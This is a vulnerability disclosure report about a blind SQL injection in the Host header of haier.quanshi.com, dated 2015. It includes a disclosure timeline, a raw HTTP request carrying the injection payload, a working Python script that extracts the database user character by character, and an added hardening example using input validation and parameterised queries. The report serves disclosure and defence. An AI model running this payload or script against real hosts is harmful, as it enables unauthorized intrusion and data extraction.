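2015-08-25: Details reported to the vendor; awaiting vendor handling
2015-08-25: Vendor confirmed; details disclosed to the vendor only
2015-09-04: Details disclosed to core white hats and experts in related fields
2015-09-14: Details disclosed to regular white hats
2015-09-24: Details disclosed to intern white hats
2015-10-09: Details disclosed to the public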
http://haier.quanshi.com/
GET / HTTP/1.1
Host: haier.quanshi.com%' AND length(user())=17 AND '000JkpN'!='000JkpN%
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=Rk0SoIqoQKFyzUuiYenpbJEELfbvUy4%252B.A
Connection: keep-alive
The Host header is vulnerable to SQL injection.
Script attached:
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print 'Start to retrive MySQL User:\n'
user = ''
for i in range(1, 18):
    for payload in payloads:
        print '.',
        s = "haier.quanshi.com%%' AND ascii(mid(lower(user()),%s,1))=%s AND '5'!='5%%" % (i, ord(payload))
        headers["Host"]=s
        conn = httplib.HTTPConnection('haier.quanshi.com', timeout=60)
        conn.request(method='GET', url='/', headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        #print html_doc
        if html_doc.find(u'云会议(') > 0:
            user += payload
            sys.stdout.write('\r[In Progress]' + user)
            sys.stdout.flush()
            break
print '[Done]MySQL user is %s' % user
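
The fix for this class of bug, as an added example that is not code from the report or the vendor: it assumes the application selects a site record by pasting the Host header into a LIKE pattern, which the `%' ... '...%` shape of the request suggests but the report does not show. The `sites` table, the function names and the SQLite backend are hypothetical stand-ins.

```python
import re
import sqlite3

# Constructed sample data: an in-memory stand-in for a site-by-hostname table.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE sites (domain TEXT, title TEXT)")
db.execute("INSERT INTO sites VALUES ('haier.quanshi.com', 'tenant-a')")

# A Host value may contain only letters, digits, dots, hyphens and an optional :port.
HOST_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?(?::[0-9]{1,5})?"
)

# Constructed probes in the shape of the request on this page, with the
# MySQL-only user() test swapped for a constant so SQLite can evaluate it.
TRUE_PROBE = "haier.quanshi.com%' AND 1=1 AND '5'!='5%"
FALSE_PROBE = "haier.quanshi.com%' AND 1=2 AND '5'!='5%"


def lookup_vulnerable(host):
    # Assumed shape of the flaw: the header is concatenated into the SQL text,
    # so a quote in the Host value ends the string literal and adds conditions.
    sql = "SELECT title FROM sites WHERE domain LIKE '%" + host + "%'"
    return db.execute(sql).fetchone()


def lookup_hardened(host):
    # 1) Treat Host as untrusted input: reject anything that is not a hostname.
    if not HOST_RE.fullmatch(host):
        return None
    # 2) Strip the port, normalise case, and bind the value as a parameter so
    #    it can never be parsed as SQL. Exact match replaces the LIKE pattern.
    name = host.rsplit(":", 1)[0].lower()
    return db.execute(
        "SELECT title FROM sites WHERE domain = ?", (name,)
    ).fetchone()


if __name__ == "__main__":
    for h in ("haier.quanshi.com", TRUE_PROBE, FALSE_PROBE):
        print(repr(h), lookup_vulnerable(h), lookup_hardened(h))
```

The vulnerable lookup answers differently for the two probes, which is the yes/no signal the attached script relies on; the hardened lookup returns nothing for either.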
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-08-25 16:42
We will handle this as soon as possible, thank you!
None yet